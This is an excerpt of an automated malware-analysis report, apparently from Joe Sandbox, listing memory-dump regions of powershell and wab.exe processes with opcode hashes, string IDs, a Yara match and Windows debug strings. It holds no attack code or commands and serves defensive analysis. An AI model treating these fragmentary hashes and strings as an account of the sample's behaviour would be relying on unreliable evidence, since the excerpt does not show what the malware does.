                    • Opcode ID: 757d468bde207cb7d726efad8b8baca78c96104a941063976549b99a77b1ff33
                    • Instruction ID: 81d1b914b9a4db5a37a919b110b83e7657b9084252b87eacede1ba2649c8de12
                    • Opcode Fuzzy Hash: 757d468bde207cb7d726efad8b8baca78c96104a941063976549b99a77b1ff33
                    • Instruction Fuzzy Hash: FC71AC30A00219CFCB14DF69D890AAEBBF2FF84354F14856AD419DB760DB75AC46CB80
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 03f1f8e4aba2c81570219148eec0501d29933e0386e7f37001d55ee0777cf8a7
                    • Instruction ID: 0ec43b465dc29a2db214601430248e4b90eb254a75e0d74c97ba3ea57a174428
                    • Opcode Fuzzy Hash: 03f1f8e4aba2c81570219148eec0501d29933e0386e7f37001d55ee0777cf8a7
                    • Instruction Fuzzy Hash: 0E715A70A10208DFCF14DFB5D590AADBBF6FF88348F148529D815AB2A0DB75AC86CB51
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7e7f99218688f133b422ab5830ebe9f19fb61a1706ff5bdebae759549edaa472
                    • Instruction ID: 605488c7a4249f2747477f2a306a27e7fe8550ba70ae3f14418d1a380255f73a
                    • Opcode Fuzzy Hash: 7e7f99218688f133b422ab5830ebe9f19fb61a1706ff5bdebae759549edaa472
                    • Instruction Fuzzy Hash: B1616D74E00204DFDB54CF58C491AAEBBB3EF49354F198499D8256B392DB32E882CB91
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a93ce7881b9f59c15237f766035fe708ade5aab9d7e6cf34eb6680da70807cd0
                    • Instruction ID: 42bc728605815778940a41eca0e728d70ac033810901bb2949a7e186392677a5
                    • Opcode Fuzzy Hash: a93ce7881b9f59c15237f766035fe708ade5aab9d7e6cf34eb6680da70807cd0
                    • Instruction Fuzzy Hash: D4519FB0A00209DFDB14DFA5C894BEEBBB6FF84304F148469D416AB3A4DBB4AC45CB51
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c5fab8f1f0b43735623903ed86862e48c34b9d4e2dd1102bffa457abd8243615
                    • Instruction ID: 8e9eb1d9fabe1dbc2f2f14866a3e8361df9c8e1cf48138800e7db8502b8c9061
                    • Opcode Fuzzy Hash: c5fab8f1f0b43735623903ed86862e48c34b9d4e2dd1102bffa457abd8243615
                    • Instruction Fuzzy Hash: EE41B171A00208CFD714DB65C594AAD7BB2FF89354F0840A9D816EB7A4CF74AC41CB51
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7897ddccf59f385e1788e5e83b5307d9b885e53c1bc5770241fb40d8e2b81ff2
                    • Instruction ID: 9115efe1be898f8577f6c3148611eebb46b7dd91786e2afe1489f78c55b3b243
                    • Opcode Fuzzy Hash: 7897ddccf59f385e1788e5e83b5307d9b885e53c1bc5770241fb40d8e2b81ff2
                    • Instruction Fuzzy Hash: A641E275A00505DFCB09CF99C5D4AEABBB1FF48310B258599D855AB2A4C736FC90CFA0
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 37b0b5ff84acc153fa51b13f5a20496d3a71b0d4e8da959eb8078f7fdb4ad9f8
                    • Instruction ID: dc214ff62c0d59cce6ac4874862344fe7ce15dad26c1437934d54c9271767890
                    • Opcode Fuzzy Hash: 37b0b5ff84acc153fa51b13f5a20496d3a71b0d4e8da959eb8078f7fdb4ad9f8
                    • Instruction Fuzzy Hash: 55318434B40214AFDB0497B4C955BAE7A67EF84344F148818E9056F396CE77AC468BA1
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cee4c5b75c7dcb1b7c1081897a2804c4868de73fc7db40fbb2b1127cde8f6914
                    • Instruction ID: 4bc9beaf4cf4642c1401ef80e8a6483683117b23c545f66cf6c8a7dce969e0dd
                    • Opcode Fuzzy Hash: cee4c5b75c7dcb1b7c1081897a2804c4868de73fc7db40fbb2b1127cde8f6914
                    • Instruction Fuzzy Hash: 00316CB6F042008FDBA64F648841B7D3BA39F91259B0F4595D9019F291CB36ED42C3B2
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7cdcf934e5600b292b4143a6f007b20c1a964519226b89cce16a6aaa466cb0a6
                    • Instruction ID: 1438a18a28bfdb29eb66ec711881356ed4a310ef78f2f8293eac1974720c1d08
                    • Opcode Fuzzy Hash: 7cdcf934e5600b292b4143a6f007b20c1a964519226b89cce16a6aaa466cb0a6
                    • Instruction Fuzzy Hash: 9E31FC34A00218CFCB25DB64C8946EEB7B2BF49345F1544E9D919AB361EF35AE81CF81
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ed6a7b511d53ac67ac1ef8c77ebca6d1e1945cf06fb5ca6971594e2a2941ef4e
                    • Instruction ID: 14341fe2c9fc762d6c4d63ed8c891aad853581d27e6c9dbe68d7f437cf0a9e6b
                    • Opcode Fuzzy Hash: ed6a7b511d53ac67ac1ef8c77ebca6d1e1945cf06fb5ca6971594e2a2941ef4e
                    • Instruction Fuzzy Hash: 67319E74E05249DFCB01CF6CD8909AABBB4EF89340B15809AD829DB362D334EC45CBA1
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7a82a3d9d4f067852edcd55216ea46220de63c0682ce3cfd646853053a714522
                    • Instruction ID: ecea53fbb88f239bae4af9891b1ee8b511e3aa1b809dbb4ea2f99878c22893a8
                    • Opcode Fuzzy Hash: 7a82a3d9d4f067852edcd55216ea46220de63c0682ce3cfd646853053a714522
                    • Instruction Fuzzy Hash: 1F21F674A00219DFCB04CF49C990AAAFBB1FF49310B158599E909AB761C735EC81CFA0
                    Memory Dump Source
                    • Source File: 00000006.00000002.2596095743.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4150000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d94ed4fcd5d6478ce2f9d241a8bf07510d7350d197d514fa51dfef9f633d4b30
                    • Instruction ID: 2e495708d1d4c8c0ef0fd188512ae2dbd4171b38becbc84412f92eeed3f794b5
                    • Opcode Fuzzy Hash: d94ed4fcd5d6478ce2f9d241a8bf07510d7350d197d514fa51dfef9f633d4b30
                    • Instruction Fuzzy Hash: 352117B4A042099FCB04DF98D9909AEBBB5FF89310B158599E819EB361C735FC41CBA1
                    Memory Dump Source
                    • Source File: 00000006.00000002.2595819201.0000000003FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FBD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_3fbd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6606aac7c8489bd1863354fde53b1d4f3c92e777f85a0a4dfb79809ef4555cc5
                    • Instruction ID: 2c5f4d8f6dd01f647c2e25a4cd7ab16b8bff411fd5d0ec68a1c5199a5a320fed
                    • Opcode Fuzzy Hash: 6606aac7c8489bd1863354fde53b1d4f3c92e777f85a0a4dfb79809ef4555cc5
                    • Instruction Fuzzy Hash: 5501A7B14053459AD720CE16CD84BA7FFACEF463A4F1CC46AFD490A25AC2799841CAB2
                    Memory Dump Source
                    • Source File: 00000006.00000002.2595819201.0000000003FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FBD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_3fbd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a77886007bbe058f2bdfbad756120f1dae734783e883cd1c7ff3c20256516ebd
                    • Instruction ID: e3815375f584921bf3a78940456ad75d6998dfe3a71469e9a448a07b07053f69
                    • Opcode Fuzzy Hash: a77886007bbe058f2bdfbad756120f1dae734783e883cd1c7ff3c20256516ebd
                    • Instruction Fuzzy Hash: 8201447140E3C09ED7128B25C894752BFB4DF47224F1D84DBE9888F1A7C2695845C772
                    Memory Dump Source
                    • Source File: 00000006.00000002.2595819201.0000000003FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FBD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_3fbd000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9bbab950d75b45d9fb61b8ce0cd937d16f8af493c36f60e8dd7df7142fb414c7
                    • Instruction ID: bc641198e7a3efaf933692d38f6ee340ad832d19a9d8cc0b0b335fd01ae57d1c
                    • Opcode Fuzzy Hash: 9bbab950d75b45d9fb61b8ce0cd937d16f8af493c36f60e8dd7df7142fb414c7
                    • Instruction Fuzzy Hash: A2213AB2900205DFCB05DF15DAC0F56BF79FB84325F2485ADE9090B266C33AD456CBA2
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (o]q$(o]q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$tP]q$tP]q
                    • API String ID: 0-1314254452
                    • Opcode ID: 617b264244312fa77af1c4f2e4555675411d4cc45a790e6ac575c2605f5e8e03
                    • Instruction ID: 5c8690e5c12c477072ba4b9f1e1f74e3baa74937b4e5ab0efd4c8304cd5cfc0f
                    • Opcode Fuzzy Hash: 617b264244312fa77af1c4f2e4555675411d4cc45a790e6ac575c2605f5e8e03
                    • Instruction Fuzzy Hash: 25E18F35F00214DFDB68DFA8C554AAEBBA7EF88310F188465E9059B355CB71EC42CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-3118171705
                    • Opcode ID: 727f7ad1329c6f5d05847bb2bb350dc798c314f9318df782c7862cd2547c9cdf
                    • Instruction ID: 250a7796410c2fc85fce7dd4b3b1bb7c0a9f94c4a0f1aaf28197117cd2ab0ca2
                    • Opcode Fuzzy Hash: 727f7ad1329c6f5d05847bb2bb350dc798c314f9318df782c7862cd2547c9cdf
                    • Instruction Fuzzy Hash: 2C514833F083158FDBA94E29C8506267BA7AF82650B1C446ADA45CB259CE32ED45C7E3
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$tP]q$tP]q$$]q$(cq$(cq$(cq
                    • API String ID: 0-537408273
                    • Opcode ID: fc0162b48518974f671a9c12459e02bc067872f588d3963a72579e85d91329c4
                    • Instruction ID: 73576a724bf6110b07f3befcaa6b07ab4ca8d2dd295a763fe966e7fc1e50c08f
                    • Opcode Fuzzy Hash: fc0162b48518974f671a9c12459e02bc067872f588d3963a72579e85d91329c4
                    • Instruction Fuzzy Hash: 2771BE31E00205DFDB648F58C584BAAB7B3AF89751F5D845AE844AF291CB31ED81CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$tP]q$tP]q$$]q$(cq$(cq$(cq
                    • API String ID: 0-537408273
                    • Opcode ID: 83f35ea2ca3ac3f4eec938da18244e106f680071181ea335876bfe4e2938028b
                    • Instruction ID: 72735c5f5208073475fc59eb38ee1ca890b5ecf857b3ab68d9a7a0fab00616ff
                    • Opcode Fuzzy Hash: 83f35ea2ca3ac3f4eec938da18244e106f680071181ea335876bfe4e2938028b
                    • Instruction Fuzzy Hash: 5C619E31E00205EFDB648F58C584BAAB7E3AF88751F5D8459E804AF294CB71E981CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$TQbq$TQbq$tP]q$$]q$$]q$$]q
                    • API String ID: 0-2778409501
                    • Opcode ID: fd8c2b0b8a77eb5db7c1da8467600ba1d38ff42c5cf2875c369d96d4e6edfa75
                    • Instruction ID: b6898b83764853cc16974706c7c539464dc342ac3f6446b8f600e732a6408607
                    • Opcode Fuzzy Hash: fd8c2b0b8a77eb5db7c1da8467600ba1d38ff42c5cf2875c369d96d4e6edfa75
                    • Instruction Fuzzy Hash: 95519F31E00205DFDFA88E09C544BA6B7B3BF44751F5D84AAE8059B290C7B1FD84CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: Tk$4']q$4']q$4']q$4']q$DUk
                    • API String ID: 0-2132101123
                    • Opcode ID: a7dcc608f2e73e9e3c6ecd5e5e652cc1734d2b7d6e4109875badf59106c7a79b
                    • Instruction ID: 0655f55d928431367be5754607919024f2fdee2347f80d6377820d797576d100
                    • Opcode Fuzzy Hash: a7dcc608f2e73e9e3c6ecd5e5e652cc1734d2b7d6e4109875badf59106c7a79b
                    • Instruction Fuzzy Hash: AF912435F05208CFCBA49F68D444AAABBE7EFC5215F2884AAD405DB215DF31E805C7A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: XRbq$XRbq$XRbq$tP]q$tP]q$$]q
                    • API String ID: 0-1061996819
                    • Opcode ID: 0bafa864e13173439a31aaf48ecf069f8adbcb6675b281e4f12d583f9b3c404f
                    • Instruction ID: 533bd7ebb7f1c3d463ee9b4b4a66bdc6dd7def2a9910b7288218e8ad27d7420b
                    • Opcode Fuzzy Hash: 0bafa864e13173439a31aaf48ecf069f8adbcb6675b281e4f12d583f9b3c404f
                    • Instruction Fuzzy Hash: 5271E431F002159FDB659B68C454AAABBF7AF88710F18C469E8069F295CB71FC41CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                    • API String ID: 0-3723351465
                    • Opcode ID: f9d28e437fe178e82d6a499ccaa3d78e6c7d866c2a5d0a7e0383d9f6b9ac2543
                    • Instruction ID: d145cf3a088db478704293820f74db12fa17d3212705be8a55b315275b54c0b5
                    • Opcode Fuzzy Hash: f9d28e437fe178e82d6a499ccaa3d78e6c7d866c2a5d0a7e0383d9f6b9ac2543
                    • Instruction Fuzzy Hash: 2C414C31F043059FDB655FE9885056BBBF7AF82210B1C84BBC855CB252DA75E405C7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q$$]q
                    • API String ID: 0-416004693
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$tP]q$$]q$$]q$$]q
                    • API String ID: 0-2702571027
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q$$]q
                    • API String ID: 0-2353078639
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: tP]q$tP]q$$]q$$]q$$]q
                    • API String ID: 0-1831577214
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (o]q$(o]q$(o]q$(o]q
                    • API String ID: 0-1261621458
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q
                    • API String ID: 0-3637193552
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q
                    • API String ID: 0-3637193552
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q
                    • API String ID: 0-3637193552
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $]q$$]q$$]q$$]q
                    • API String ID: 0-858218434
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.2605227089.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_6fd0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q
                    • API String ID: 0-978391646

                    Execution Graph

                    Execution Coverage:0%
                    Dynamic/Decrypted Code Coverage:20%
                    Signature Coverage:100%
                    Total number of Nodes:5
                    Total number of Limit Nodes:0

                    Control-flow Graph

                    APIs
                    • Sleep.KERNELBASE(00000005), ref: 04295304
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2791578179.00000000041A8000.00000040.00000400.00020000.00000000.sdmp, Offset: 041A8000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_41a8000_wab.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0

                    Control-flow Graph

                    Strings
                    • The resource is owned shared by %d threads, xrefs: 21428E2E
                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 21428E3F
                    • write to, xrefs: 21428F56
                    • This failed because of error %Ix., xrefs: 21428EF6
                    • The critical section is owned by thread %p., xrefs: 21428E69
                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 21428FEF
                    • a NULL pointer, xrefs: 21428F90
                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 21428D8C
                    • *** Resource timeout (%p) in %ws:%s, xrefs: 21428E02
                    • <unknown>, xrefs: 21428D2E, 21428D81, 21428E00, 21428E49, 21428EC7, 21428F3E
                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 21428E86
                    • an invalid address, %p, xrefs: 21428F7F
                    • The instruction at %p referenced memory at %p., xrefs: 21428EE2
                    • *** then kb to get the faulting stack, xrefs: 21428FCC
                    • The resource is owned exclusively by thread %p, xrefs: 21428E24
                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 21428F26
                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 21428F2D
                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 21428DB5
                    • read from, xrefs: 21428F5D, 21428F62
                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 21428E4B
                    • *** An Access Violation occurred in %ws:%s, xrefs: 21428F3F
                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 21428F34
                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 21428DC4
                    • *** Inpage error in %ws:%s, xrefs: 21428EC8
                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 21428DD3
                    • *** enter .exr %p for the exception record, xrefs: 21428FA1
                    • The instruction at %p tried to %s , xrefs: 21428F66
                    • Go determine why that thread has not released the critical section., xrefs: 21428E75
                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 21428DA3
                    • *** enter .cxr %p for the context, xrefs: 21428FBD
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above 